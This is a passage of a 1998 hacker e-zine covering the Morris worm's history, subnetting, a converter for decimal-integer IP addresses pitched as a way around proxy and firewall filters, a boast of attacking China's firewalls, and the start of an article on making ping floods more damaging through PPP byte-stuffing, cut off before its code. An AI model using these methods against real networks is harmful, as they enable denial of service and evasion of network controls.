____ __. | |/ _|____ ____ ____ | <_/ __ \_/ __ \ / \ | | \ ___/\ ___/| | \ |____|__ \___ >\___ >___| / \/ \/ \/ \/ ____ ____ .__ __ \ \ / /________________ ____ |__|/ |_ ___.__. \ Y // __ \_ __ \__ \ _/ ___\| \ __< | | \ /\ ___/| | \// __ \\ \___| || | \___ | \___/ \___ >__| (____ /\___ >__||__| / ____| \/ \/ \/ \/ |--------Issue #6 December 1998----------| Legions of the Underground |-----------www.legions.org--------------| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *---The Legions Staff---* optiklenz - The man with the circuit board boxers icer - is in search of Terabyte ethernet nirvana. aphex -"I love rules, I think they're wicked" lasik - " that's not an ATARI 2600 is it!?" cap n crunch - "knows how to whistle" sreality - "the original code pimp - betta' act like you know, bitch ;)" HyperLogik/m0f0 Contact your local netherlands phone operator Zyklon - taking over the world with a 8086 and a 300 baud modem tip - brings his ALTAIR to nudy bars [havoc] - kM - kM- uses tape feeds to pimp his ho like a TX-0 defiant - "wheres my pay" Duncan Silver- DigiEbola - Of course I'm drunk, I ain't no stunt driver. flemming - "not with that burnt out peice of shit" Bronc Buster - the keyboard cowboy lothos - "The Doctor is IN" mercs - NetJammer - dethl0k -coded a loop in his tie NtWakO/NeatHack -Bugs in NT? Your shitting me.... Mnemonic - zortin8r -"Someone add me to these lists!" King BonG - IsolationX - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [01X10] Introduction Digital Ebola [02X10] Letters to Editor The Readers [03X10] The Morris Internet Worm Defiant [04x10] Setting Up Subnets m0f0 [05X10] Defunct Internet Protocol [DIP Security] Optiklenz [06X10] Exploiting PPP Frame Byte-Stuffing Noc-Wage [07X10] NT Security- Tips & Techniques Neathack [08X10] Rootfest `99 Details Defiant/Lothos [09X10] Revamped bootp Exploit Bronc Buster [10X10] In the News sources =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Introduction Digital Ebola =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Welcome to another wholesome edition of Keen Veracity. As I sit here, in my cozy little corner of cyberspace, I am wondering where to base this weeks editorial. And it came to me, the art of thinking. More to the point of creative thought. Much of what consists of the computer industry, and hacking in general is free thought. As a computer cannot code itself, sometimes the human mind is at a segfault. What runs through the minds of the people on the cutting edge of the field? Lunacy? Will? Or plain desire? To hack the machine, you have to hack yourself. Inspiration, in any case is needed. We may get it through a book, a action or even history itself. Who knows, yes even Keen Veracity! The whole point to this ramble is, that sometimes its hard to find the inspiration, and the ideas to make the cutting edge things happen. We read, we poke at keys with the tunes at 190db, goto conventions (check out the RootFest 99 article) and we converse among our peers in strange mediums and the ideas flow. This I believe, is our purpose, and it is a good one. If we do anything in the world, let's provoke someone into having a good idea and to act on it. This week, I am pleased to announce that our site www.legions.org is back up, and running. You are sure to see many improvements as it will continue to be improved upon. Also, we are gearing up for Rootfest 99, in May. The Legions crew will be out in effect, with t-shirts, and hardcopies of Keen Veracity, which is now not only avaliable in text, tar, zip, and prc formats, but in paperback, complete with a kickin cover and a included diskette with the code we feature here. In addition to our table, Optiklenz will be speaking over Cisco security and encryption. This convention is sure to be a blast, and a good chance to compare notes, and meet the Legions crew. For more information, see Lothos's article below, or check out www.rootfest.org. That looks like the end of my rant for the week. If you would like to submit a article, or become a official KV Distro Site, please email digi@wintermute.linux.tc Happy reading! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Letters to the Editor The Readers =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Subject: Novell article in Keen Veracity 5 This was an excellent article, which covered the subject of security in Novell very well. I have one error to draw your attention to though. In the intro Ntwak0 states: "First Simple Rule Upgrade to NetWare 4.x this will defeat many of the attacks", this is ONLY true if the sys admin has not checked the box to run in bindery mode. This is an emulation system NetWare runs to allow communication between mixed NW3.x and NW4.x servers. If this is enabled, 90% of 3.x attacks will still work on a 4.x server environment. otherwise an excellent article. Max the Silent If you wish to have a list of exploits that still run on 4.x (whatever the bindery mode says) mail me. ( Yah, looks like we got some of that thought thing goin on :P ) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= The Morris Internet Worm - Historial Information Defiant =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - [ The Morris Internet Worm ] - by - [ Defiant ] - - [ http://wintermute.linux.tc/~defiant ] - ----[ i n t r o d u c t i o n ] This is something I intended to do a while ago, well actually nearly a month so that it came out around 10 years after the internet worm was released, but as usual, things go wrong and its over a month late, my apologises. Anyway. What I aim to do is described what happened that day and also described the worm and what it did and some history of the worm and all things connected. ----[ w h a t w a s i t ? ] Even today there is some confusion as to what the worm was. Some people still call it a virus but for many reasons this is not true. The main difference between the worm and a normal virus is the way it reproduces and spreads. When a normal computer virus enters a system, usually via an infected disk or file downloaded from the internet, it infects a system file and also a file that will be used sometime in the near future. The alteration to this file usually is the addition of the commands to active the virus. Now, lets see for these two examples how the worm was different. First of all, a worm doesn't need to be spread via a disk of infected file, it breaks into computers via exploits, such as statd or named, although, these bugs wern't around then. When the virus has broken in it will launch another program, which will scan the internet for more hosts it can gain entry to. At no time does it require a user to launch the program or send it to someone, it acts independently, some may call this AI (artificial intelligence), although in a very basic form. All computers attatched to the internet could be potential targets to the worm, unlike a virus, where it would be those that were accidently infected. ----[ h i s t o r y of w o r m s ] When the Internet Worm was released in 1988 it was by no means the firt of its kind, nor was it the last. The name of the worm comes from a book called The Shockwave Rider written by John Brunner in 1975. In short, the story is about a totalitarian government that controls its citizens through a powerful computer network. A freedom fighter infests this network with a program called a "tapeworm" forcing the government to shut down the network, thereby destroy its base of power. Between this book and the 1988 Morris Internet Worm, it is no wonder that worms got a bad name. The truth of the matter is the first worms were actually designed to facilitate better network usage. <1971> In 1971 the first program that could reasonably be called a worm was written by Bob Thomas. This was a program for Air Traffic Controlers to notify them when an plane moved from one computer to another. The program, called Creeper, only moved from one screen to another displaying the message "I'm creeper! Catch me if you can!", it NEVER reproduced itself. After this idea several programmers tried the idea out to perform tasks but within a few months the idea died out. <1980> In the early 1980's, John Shock and Jon Hepps of Xerox's Palo Alto Research Center began experimenting with worm programs. This was in fact the first time the term worm had been applied to this sort of code. They developed 5 worms between them, each of which was used to perform a specific helpful task around the network. Some of these were quite simple such as the Town Crier which traveled around the network posting announcements, and some were complex, such as The Vampire, which would be idle during the day, but during the night, when CPU usage was low, it would take advantage of this and use it, then at dawn, it would save its work and wait until night again. These worms were very useful until one night one of Xerox's worms malfunctioned and when people turned up to work the next day they found all their machines crashed. Making this problem even worse, when people restarted their machines, they found the malfunctioned worm continued to crash their systems. It was at this point when an vaccine had to be written, when it became apparent that worms could be dangerous and cause problems. After this minor disaster worm research dropped out of the public eye until 1988 when Morris' worm thrust it back into the spotlight. Morris' worm was frontpage news in most of the papers and it was currently US election time, so it was pretty impressive, and people all over the world were infected with the worm and experiencing problems. Since Morris' worm, no worm has been able to replicate the shock value, however there have been worms since then. In 1989 another worm was released, this one very destructive, but didn't cause as many problems. The following is what this worm did.... It attempts to gain system privileges. If it succeeds: It turns off mail to the SYSTEM accounts, It alters the system login command to make it APPEAR that all a user's file has been deleted. It alters the announcement message to display a message of its own choosing. Even if it fails to infect a system account: It transmits its location (thus indicating that the system it is on has a security hole) It harasses users by using the PHONE function to ring them It records user passwords that are found to be simple, such as the null string and the user's username. There are still worms around today in the late 90's, but none have ever caused as many problems. The most recent I can think of would be ADMw0rm. Just because they haven't been reported though, doesn't mean that they don't exist. We all learn from mistakes, and because of the mistakes Morris made, and also learning that destructive worms don't help, people would be able to make more efficient worms that could go almost undetected, however, it is unlikely. ----[ e f f e c t s ] Before I state what Morris's Internet Worm did do, it may be easier to state what it didn't do. - The worm didn't alter or destroy files - The worm didn't save or transmit the passwords which it cracked - The worm didn't make special attempts to gain root or superuser access in a system (and didn't utilize the privileges if it managed to get them). - The worm didn't place copies of itself or other programs into memory to be executed at a later time. (Such programs are commonly referred to as timebombs.) - The worm didn't attack machines other than Sun 3 systems and VAX computers running 4 BSD Unix (or equivalent). - The worm didn't attack machines that were not attached to the internet. (In other words, no computers that didn't have an internet address were attacked. Modems do not count as internet connectors in this respect.) - The worm didn't travel from machine to machine via disk. - The worm didn't cause physical damage to computer systems. With all of this out of the way, you are probebly wondering what did the worm do. It wasn't there for someone to gain access into thousands of computers, or cause mass destruction. From the decompiled versions of the worm it appears to do nothing, well nothing obvious anyway. The worm was designed simply to spread as far as possible and infect as much as possible. Maybe it was just a test that Morris ran before he finished the worm to do something more sinister, we will probebly never know. However, further to add to the theory that this was a test, is that the code was far from perfect. Apparently at the time the worm was released, it contained numberous bugs and also the programmer had greatly underestimated the effects the worm would have. One of the bugs that was in this was the fact that once a worm infected a host, it may reinfect many times, thus being a DoS attack. this seemingly untraceable process, soon reinfected the same machines and caused it to crash. This is an extract from the book, "A Tour Of The Worm" by Donn Seely, explaining this problem. All the following events occurred on the evening of Nov. 2, 1988. 6:00 PM At about this time the Worm is launched. 8:49 PM The Worm infects a VAX 8600 at the University of Utah (cs.utah.edu) 9:09 PM The Worm initiates the first of its attacks to infect other computers from the infected VAX. 9:21 PM The load average on the system reaches 5. (Load average is a measure of how hard the computer system is working. At 9:30 at night, the load average of the VAX was usually 1. Any load average higher than 5 causes delays in data processing.) 9:41 PM The load average reaches 7 10:01 PM The load average reaches 16 10:06 PM At this point there are so many worms infecting the system that no new processes can be started. No users can use the system anymore. 10:20 PM The system administrator kills off the worms 10:41 PM The system is reinfected and the load average reaches 27 10:49 PM The system administrator shuts down the system. The system is subsequently restarted 11:21 PM Reinfestation causes the load average to reach 37. In short, in under 90 miniutes after infection, the system was unusable, and there was great costs due to loss of service and time spent trying to fix the problems the worm caused. Between $100,000 and $10,000,000 were lost due to lost access to the internet at an infected host, according to the United States General Accounting Office. ----[ t h e r o u t e ] This is the "route" the worm took once it had infected a system. 1 - First it would change its process name to "sh" in order to mask its process name. This is quite obviously the Bourne Again Shell, a common shell enviroment for UNIX systems. 2 - The worm's creator didn't want the worm to be easy to capture, since once someone captured a copy of the running worm, it would be possible to deconstruct the code and figure out how to stop it. To this end, the next thing the Worm does is set the maximum core dump size to zero bytes. A "core dump" places a copy of the CPU's running process into memory for further examination. A core dump occurs whenever a program crashes, but can also be forced. Since the worm set the size of the core dump to 0, even if the program crashed, or was forced to crash, investigators would not get a copy of the running worm. 3 - The worm also reads the current time at this point and stores this for seeding the random number generator. This will be used later. 4 - Additionally, when the Worm was executed, it might have been executed with the -p flag, an optional command line argument, followed by a decimal number which was believed to the the process identification number of the current worm's parent. 5 - The rest of the command line arguments that the Worm was executed with are the names of the object files that it needs in order to operate at full capacity. The worm tries to load the files named by these arguments into its address space. If the -p argument was given above, then it also deletes these files after loading them, and later deletes the disk copy of the running worm itself. It also tries to delete the file /tmp/.dumb, although, since this file is never referred to again, it is unclear why it does so. If it fails to load any one of these object files, the worm quits. Otherwise, the worm continues. 6 - The Worm checks to make sure that it had at least 1 object file in its command line. If it didn't, it quits. 7 - The Worm then checks to see that it has successfully loaded the file l1.c. This is the file that the Worm will use later to infect other systems If this file was not loaded, the Worm quits. 8 - The Worm then erases the text of the argument array to further hide any evidence of it's presence. 9 - The Worm then scans the network interfaces of the machine it is on, getting the flags and addresses of each interface. If it cannot find any interfaces, the Worm quits. It also loads the network mask which allows the Worm to determine what internet address are used by the local network. 10- The Worm then kills the process given in the -p option (probably the process that created this copy of the worm), changing the current process group to avoid killing itself. At this point, the initializations are complete and the worm calls the central routine of the worm. 11- Using a random number (seeded by the current time), the Worm then determines whether or not to check for itself. There is a one in seven chance that it will not; otherwise, the Worm checks itself. 12- If the Worm does not check for itself, it will go ahead and continue. This one in seven chance was originally added to make the Worm more difficult to kill; ironically, it worked in the sense that this addition is why the Worm spread so quickly. In addition, only the first copy of the Worm on any one machine would check for itself; all subsequent copies skip the test entirely. 13- There is also a procedure that was supposed to send one byte to the address 128.32.137.13 (ernie.berkeley.edu), port 11357; this did not work, though, since the program used the TCP command sendto, instead of a UDP datagram. Since the program never initiated a connection with the aforementioned port, the TCP command failed with a "socket not connected" error. This random (one in fifteen) byte appeared to be for monitoring the overall progress of the Worm on the net. If the worm had been devloped further, like many people think it would of after the origional version if it had worked as intended, could have been to say that a host had been backdoored etc, but the worm never had such a function in it. After this, the Worm proceeds to the primary loop of the program. This infinite loop calls all of the major procedures in the following order: 14- Cracksome, the routine which searches for hosts that the Worm can break into; 15- The Worm then runs other_sleep for thirty seconds; 16- The Worm then runs Cracksome again; 17- The Worm then forks into two child processes and kills the parent process. The child has all of the information that the parent had; in addition, the child has a new process number, making the worm difficult to hunt down. The Worm then runs through the infect process again; 18- Then the Worm runs other_sleep for 120 seconds; 19- Before looping back on itself, the Worm checks to see how long it has been running. If it has run for over 12 hours, it cleans up some of the host list entries. The Worm loops through this procedure until it is told to quit by another worm or is killed. ----[ m o r r i s ] In case you were wondering what happened to Morris because of his actions I will tell you. He was convicted of a Federal felony in the case. The law involved was 18 USC 1030 (A)(5)(a), the Computer Crime and Abuse Act of 1986. He was found guilty in February of 1990 in US District Court in Syracuse, NY. In May of 1990, he was sentenced -- outside of Federal sentencing guidelines -- to 3 years of probation, 400 hours of community service, and $10,050 in fines plus probation costs. His lawyers appealed the conviction to the Circuit Court of Appeals, and the conviction was upheld. His lawyers then appealed to the Supreme Court, but the Court declined to hear the case -- leaving the conviction intact. For a while, Robert was (allegedly) working as a programmer (non-security related) for CenterLine Software (makers of CodeCenter, et. al.). More recently, Robert has been working on his Ph.D. under the direction of H.T. Kung at Harvard University. He is also involved with the ViaWeb company. To the best of my knowledge, he has not spoken publicly about the incident, nor has he attempted to work in computer security. ----[ w r a p u p ] Well, thats pretty much some basic information on the worm and related things. I want to thank everyone out there that has a site with information on it about the worm, as I took information from so many I cannot accuratly credit these people for their information. if by any chance you see something that you think you should be credited for please mail me and let me know and I will give you the credit you deserve. -Defiant defiant@wintermute.linux.tc http://wintermute.linux.tc/~defiant =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Setting Up Subnets m0f0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Subnets are logical subsections of a single TCP/IP network. For administrative or technical reasons, many organizations choose to divide one network into several subnets. Routing can get very complicated as the number of networks grows. For example, a small organization might give each local network a Class C number. As the organization grows, administering network numbers may get out of hand. A better idea is to allocate a few Class B network numbers for each major division in a company: one for engineering, one for operations, and so on. Then, divide each Class B network into physical networks using subnets. In this way, you can isolate hosts from changes you might make to the network in remote parts of the organization. Subnets allow you more flexibility when assigning network addresses. The Internet Protocol allows 127 Class A networks with 24-bit host fields; 16,383 Class B networks with 16-bit host fields; and over two million Class C networks with 8-bit host fields. -Network Masks- Typically, you create subnets by using a subnetting scheme called the "address mask." When setting up your network, you should select a network-wide "network mask". A network mask determines which bits in the IP address will represent the subnet number. The remaining bits represent the host within the subnet. For example, you could configure an organization's internetwork as a Class B network. Then you could assign each local subnet a subnet number within that network. The 16 bits could be allocated as 8 for subnet and 8 for host, or 9 for subnet and 7 for host, and so on. Your decision would be transparent to everyone outside that organization. You can express network masks as a single hexadecimal number, or as four octets of decimal numbers. The default is a mask of 0xFF000000 (255.0.0.0) for Class A networks, 0xFFFF0000 (255.255.0.0) for Class B networks, and 0xFFFFFF00 (255.255.255.0) for Class C networks. You only have to specify network masks explicitly when they are wider (that is, have more one-bits) than the default values. One common case is a Class C mask on a Class B network. A Class B network provides you with 256 possible subnets, each one of which can accommodate 254 possible hosts (remember, 0 and 255 are not acceptable host addresses). But you may know that one of your subnets will ever have more than, say, 128 hosts, while you may need more then 256 subnets. In that case, you could decide to use nine bits for the subnet number instead of eight, and seven for the host addresses. The appropriate mask for this would be 0xFFFFFF80, or 255.255.255.128 (2 to the power of 7 is 128, and 128 subtracted from the possible 256 is 128). Given the above scheme, and a network address of, for instance, 131.60, the address for the first host of the first subnet would be 131.60.0.129. /etc/netmasks File The /etc/netmasks file contains the default netmasks for your system. To set up the netmask, you need to create this file. Here is a sample /etc/netmasks. # # Network masks # # only non-standard subnet masks need to be defined here # # Network netmask 128.32.0.0 255.255.255.0 Create an entry with the network number and network mask on a separate line for each network that is subnetted. You can use ifconfig to override the network masks manually. For more information about ifconfig, refer to the ifconfig(1M) Reference Manual entry. For example, consider Class B network 128.32 with an 8-bit wide subnet field (and, therefore, an 8-bit wide host field). The /etc/netmasks entry for this network would be 128.32.0.0 255.255.255.0 You can enter symbolic names for subnet addresses in the /etc/hosts file. You can then use these subnet names instead of numbers as parameters to commands. For more information about netmasks, see the netmasks(4) Reference Manual entry. Changing from a Nonsubnetted to a Subnetted Network Follow these steps to change from an internetwork that does not use subnets to one that is subnetted. 1. Decide on the new subnet topology, including considerations for subnet routers and locations of hosts on the subnet. 2. Assign all subnet and host addresses. 3. Edit /etc/netmasks as mentioned previously. 4. Edit /etc/hosts on all hosts to change host addresses. Examples of Subnets The following examples show network installations where subnets are (and are not) in use: 128.32.0.0 Berkeley Class B network (subnetted) netmask 255.255.255.0 36.0.0.0 Stanford Class A network (subnetted) netmask 255.255.0.0 10.0.0.0 Arpanet Class A network (nonsubnetted) netmask 255.0.0.0 The University of California at Berkeley is assigned the network number 128.32.0.0, so that any external router only needs to know one route to reach Berkeley. Within the campus, a Class C subnet mask is used to give each local network a subnet number, with 254 hosts on each of the 254 possible subnets. (Zero and all ones, that is 255, are reserved.) Stanford University uses a Class A network number with a Class B network mask, for 254 subnets of 65534 hosts each. The ARPANET is a Class A network without subnets; therefore, the default Class A netmask is used. m0f0 ----------------------------------------------------------------- *=-###############################################-=* [*] [*] | Defunct Internet Protocol [DIP] | | optiklenz | | Legions Of the Underground | +---+*LoU*********************************LoU*+---+ ***************************************************************** The first few paragraphs of this text serve as an general outlook for people who have no prior knowledge of the tcp/ip protocols ----------------------------------------------------------------- Every host or computer on the internet is addressed by an IP number. No two IP numbers are equivalent. A perfect analogy would be the procedure of the postal service. Think of IP's as being houses each house needs an individual identifier that is contrary to the other. [90150^] - House 1 [90151^] - House 2 [90153^] - House 3 Each house has a different home address so that the post office Is able to find it and deliver mail accordingly. This goes alike for an IP number. Each IP number is divergent from the other which allows for data intended for a particular host to be transferred to it's destination with out error. The ip's network ID remains the same in all occurrences , but it's host ID changes. Example: 60.0.0.0 - Where 60 is the network ID All IP addresses are 32bits long, and are comprised of four 8bit segments known as octets The way this is addressed is using ones, and zeros. The human mind doesn't designate numbers as well as it does words this is the reason for domain naming. Could you imagine if people were identified by a numeric value rather than a name? It'd be pretty ridiculous. Picture yourself calling out to a friend "Hey 19682842434 ?" so for the same convenience of having a static name we have static IP's with a logical address (127.0.0.1) or a domain name (www.localhost.com) that interprets all the data for us. Quick overview on Process of IP Conversion. <*-------------------------------------*> 10000001 01100100 00001111 00000110 - IP <*-------------------------------------*> to <*-------------------------------------*> 129.100.15.6 <-- decimal conversion <*-------------------------------------*> to <*-------------------------------------*> PC <-- Host Name <*-------------------------------------*> Protocols convert to the physical address going from PC (Host Name) to 129.100.15.6 (decimal address). +-=============-+ * The Process * +-=============-+ Seeing that IP's are 32 bits in 4 8bit segments. If you take 32 (bits of the ip) and multiply it by 8(bits of each ip segment) you get 256 bits or a cluster of 1's, and 0's depending on how you are looking at it. =] The give an example of how we go from an IP in decimal form to a defunct ip. We'll use www.legions.org. Resolve the domain name. In this case we have 199.227.88.145: [segments referred to as SEG] ******************** 256| 3-2-1 method... ******************** 32(8) = 256 |_SEG1(199)*256^3 | SEG2(227)*256^2_+ | SEG3(88)*256_+ | SEG4(145)_+ | 145_+ -= 3353565329 (new identifier) Defunct IP: The reason I call the new identifier a defunct IP is because when it goes through the above process it is no longer decimal form. So I refer to it as a "dead ip" Security Analysis: If you take an IP in decimal form, and convert it to a defunct IP [DIP] services will still resolve the number as an identifier for that host but since it no longer has any decimals separating segments it is perceived as an Intranet host rather than its original standing as an IP. This brings some questions of security since Intranets tend to have very little security implementation. Since the given locator is no longer considered an IP it is no longer conditional to the same security restrictions imposed on a practical host identifier. For this reason If you were obstructed from accessing specific things from behind a proxy, using the new identifier the security measures otherwise implemented no longer apply. open: www.legions.org no connection do to proxy restrictions meaning: where as 199.227.88.145 would obtain no connection 3353565329 would process. Also if you are being blocked from certain sites because they might contain ActiveX, Java applets, or if you just use AOL whereby 90% of the internet is blocked out anyway the defunct ip method will allow you to view the site with out any complications. The reason some administrators block sites that contain java, and Active X is because scripts on certain sites may be a security hazard or malicious in the sense that they cause a DOS (denial of service) or do other things which would cause otherwise keep the system from executing what it's setup to do. -------------------------------------------------------- The code below was written to go with this article ------------------------------------------------------- /* * defunct.cpp - use: Enter logical IP number. Results: Defunct Address * Defunct IP Calculation Module- * Legions Of the Underground - http://www.legions.org * Code written to assist article * written on Defunct IP's, and Security Risk in Keen Veracity 6 * optiklenz@legions.org - optiklenz * This code may be alter'd as long as proper credit is givin */ #include #include #include int ClearCin(istream& isIn) // Clears istream object { streambuf* sbpThis; char szTempBuf[20]; int nCount, nRet = isIn.rdstate(); { isIn.clear(); // Clear error flags sbpThis = isIn.rdbuf(); // Get streambuf pointer nCount = sbpThis->in_avail(); // Number of characters in buffer while (nCount) // Extract them to szTempBuf { if (nCount > 20) { sbpThis->sgetn(szTempBuf, 20); nCount -= 20; } else { sbpThis->sgetn(szTempBuf, nCount); nCount = 0; } } } return nRet; } int main() { double result=0; double numb[4]; char text[15]; cout << "Input the address you wish to use/modify...\n> "; cin.getline (text, 16); ClearCin(cin); //Parse numbers for (int x = 0, y = 0; !(x>3); x++) { char stay[3]; if (x!=3) { for(int z =0;text[y]!='.';y++,z++) { stay[z] = text[y]; } numb[x] = atof(stay); } else { for(int z =0;text[y]!='\0';y++,z++) { stay[z] = text[y]; } numb[x] = atof(stay); } if (x!=3) y++; stay[0] = '\0'; stay[1] = '\0'; stay[2] = '\0'; } cout << numb[0] << " " << numb[1] << " " << numb[2] << " " << numb[3]; //run algorithim result = ((numb[0])*(16777216)); result += ((numb[1])*(65536)); result += ((numb[2])*(256)); result += (numb[3]); int dec=0, sign=0; cout << endl << ecvt(result, 10, &dec, &sign) << flush; return 0; } ----------------------------------------------------------------------------------- End Note: Recently members of Legions Of the Underground "attacked" China yet again on their "human rights" condition. China setup firewalls in an effort to detour the people of the Chinese Republic from viewing sites which were found objectional by the Communist rule of China. These firewalls were paralyzed, and reconfigured. The group stands behind these actions 100% although the actions taken were that alone of the members who decided to impose action in an conformed fashion towards China. No one should be denied the right to view, or access data which is condignly theirs. This article is just another method in which data that is otherwise restricted to the end viewer is able to be discerned. All in all remember the information is out there, and it belongs to us. Join us in the fight to keep all data free. Keep the government(s) from impertinently tampering with rules, and regulations that go against our rights as inhabitants of this nation, as a society as a PUBLIC of the U.S.A (or whatever other country)... Ban together, and speak out in numbers before your right to speak is contraband entirely. Areas of Interest: link to effnet list the wired article list the cnn article list the msnbc article Article on Firewalls list the antionline article list the HongKong blondes article List both List the Human rights article List article on firewalls http://www.rootfest.org - Lecture on Firewall Security, and ----------------------------------------------------------------------------------- - Steve Stakton -----BEGIN PGP PUBLIC KEY BLOCK----- mQGiBDR6E3wRBADHm2aiODOCowgDqXdcFvooCTrQe6tDPqznXChCO1p0t12hhQZe 0C+/xBorkJXlqOaDadmUQVZP3Kij97SOTWU1AS1SPSTzF6VAylHalGz9iUHjxa7g SSAVrLUMngWG7hxnz7lBHFIQ8iQPjWvK5qhEQ9vcBF9ped9StPRsZlljIwCg/02Z XXrVaJUtWAxUaAARUdPt0FsEAKyhGuQA1HgGWM/GQxpvBvmDqHkNGxM9YyrF1Dg1 PWAoNuG8GdJazj18c2AODp68NwPH0dUYTxKc4ejR//OcOfl1HRfE0thJEDpqkSyQ 2iobKGkYdmug666pe0Xr3wkgBE+rnzC3RLlUdnRAu25MuEqlc6yRWAT0YH/Pl9IB eDRGA/4uAuFiEiyfd3Djhi7Wwh8/qiG7SChW0arEXq3RqHQqd3EaVR1FgNzCtvxg kK2mY07XeSX2fjlWo4ynrBdl5QXbOn9X+GzDcw1z9FBVQHaY0EJMoE0fb53bTyCG 0bdCMTid1DUKhJeekW6cPZvRQlu5IjH/+FVT9S38UsAMMwwrCrQlU3RldmUgU3Rh a3RvbiA8b3B0aWtsZW56QGxlZ2lvbnMub3JnPokASwQQEQIACwUCNHoTfAQLAwEC AAoJEGgSVovfJxzQFfcAn0WybtLnFw9jf9agk7xUaikjEjLkAKCYfA1rx/SXP5Je v5R0+ZVMqIGiibkCDQQ0ehN8EAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlL OCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N 286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/ RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2O u1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqV DNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf+OCRz2nG+ SSCrgZY2nIGz68SO+2h3weFMzdBSWQDjZ5Fa7GjRBPeTRQvectPvSqcwjeZTq8DE 1AVI/oFw1mChgfV7CgQuC+P0OK+jr6tIwyhM6gdo5NEdD7/uLWJfFi2l/AP4skVv ydmg1KGlxjvtjOFKhOGoV2vSTPRGn1l1lCzBZPRur0xTtNwk5b54o8g/NlMEsO/p /P6CRP4J1WlDkH66jST+ygAYNN0AtRy0eEPUxu7+dYC4OgT0xCcglCqKf7hnMGrf s/I2MHBbhSmdtcW5pLYcEb8iwXEitGN+plAy+OZrygJ4ytFAdnL2r9NmegUPTYz0 3t4M3hiITUmiP4kAPwMFGDR6E3xoElaL3ycc0BECKBQAoKqOQNZ82RmU4rsZRM9l a6QdQeSVAJ469y3cLO1eU5oMYpLdvSGevh0mSg== =cpan -----END PGP PUBLIC KEY BLOCK----- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Exploiting PPP Frame Byte-Stuffing Noc-Wage =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -------------------------------------------------------------- | Exploiting PPP frame Byte-Stuffing | | -*- or -*- | | How to get twice the bytes for your buck | | Noc-Wage 12/10/98 | -------------------------------------------------------------- Introduction: This paper will explain how you can use PPP frame byte stuffing to your advantage to increase the bandwidth required by the victim but not the bandwidth of the routers in between during a large size packet flood. This paper isn't being produced to encourage the kiddies out there to use Denial of Service attacks. The real reason is to help turn weapons like ping -f into more efficient and more selective weapons of mass destruction so that if they are used, they will be more effective. The basic layout of this paper will be as follows: - Introduction (Already passed it) - Explanation of Bandwidth Based Packet Flood Attacks - Brief overview of a PPP HDCL frame - Explanation of Byte Stuffing and Worst case overhead - Conclusion - Modified pingflood.c -------- Explanation of Bandwidth Based Packet Flood Attacks Bandwidth based packet floods are simply a fast succession of large sized packets used to consume bandwidth and block legitimate network traffic. A popular method of attack is the classic ping -f. This attack is the scourge of the internet. The reason is that this attack is a "carpet bombing" based attack and can result in much wider disruption than intended by the user. What some of these users don't realize is that while the end victim's connection clogs like a freeway at rush hour, the attacker's huge amounts of traffic have to pass over many networks and routers before it reaches it's intended victim. This damages the speed of the internet as a whole and can lead to entire routes being temporarily inaccessable until the attack has ended. What's proposed in this article is a way of lowering the strain put on the points between but still having the same disruptive effects on the end victim. We can take an ordinary 500 byte ECHO_REQUEST packet and using worst case overhead double its size when the end victim recieves it. -------- Brief overview of a PPP HDCL frame I'm not going to go into a large discussion on why and how PPP frames are created. If you would like to know more I'd suggest reading RFC 1662 "PPP in HDCL-like framing" PPP frames begin and end with the Flag Sequence, the binary sequence 01111110 (hexidecimal, 0x7E), this value cannot be inside of the PPP frame or . After this follows the Address field, this will usually contain 11111111 (0xFF), the All-Stations address. Control field follows the Address (Addr) field, the Control (Cntrl) field usually contains the binary value 00000011 (0x03). Next is the Protocol field which can be 8 or 16 bits. This is used to identify what kind of information is encapsulated within the PPP frame's Information Field. For a listing of protocol values see RFC 1340 "Assigned Numbers". After the protocol field is the Information (Info) Field, this is where the datagrams of up to 1500 bytes in size are encapsulated in the PPP frame. This is followed by the Frame Check Sequence used to verify the frame's data was not corrupted. The final Flag Sequence is then transmitted to end the PPP frame. PPP Frame example: | Flag | Addr | Ctrl | Protocol | Info | FCS | Flag | | 0x7E | 0xFF | 0x03 | 8/16 bit | * | 16/32 bit | 0x7E | After looking at the PPP frame you see that it begins and ends with a 0x7E, and herein lies it's vulnerability. There is a risk that within a packet you will find the value 0x7E, this could cause problems in that it may be mistaken for the Flag Sequence that indicates the end of the PPP frame. To eliminate this problem we introduce Byte-Stuffing. -------- Explanation of Byte Stuffing As explained in the PPP frame 